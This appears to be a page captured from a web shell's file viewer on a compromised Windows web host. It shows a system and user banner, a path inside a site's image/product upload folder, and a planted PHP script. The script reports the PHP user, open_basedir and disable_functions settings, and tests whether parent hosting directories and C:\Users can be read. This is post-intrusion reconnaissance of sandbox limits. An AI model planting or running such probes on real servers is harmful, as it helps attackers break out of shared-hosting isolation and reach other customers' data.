System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)
Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product
[Back to List]
<?php
echo "--- PHP Diagnostic ---\n";
echo "User: " . get_current_user() . "\n";
echo "open_basedir: " . ini_get('open_basedir') . "\n";
echo "disable_functions: " . ini_get('disable_functions') . "\n";
echo "Doc Root: " . $_SERVER['DOCUMENT_ROOT'] . "\n";
echo "CWD: " . getcwd() . "\n";
echo "--- Directory Access Test ---\n";
$tests = [
'D:\Inetpub\vhosts\appclients.in',
'D:\Inetpub\vhosts',
'C:\Users'
];
foreach ($tests as $path) {
echo "Path: $path | Readable: " . (is_readable($path) ? "YES" : "NO") . " | Dir: " . (is_dir($path) ? "YES" : "NO") . "\n";
}
?>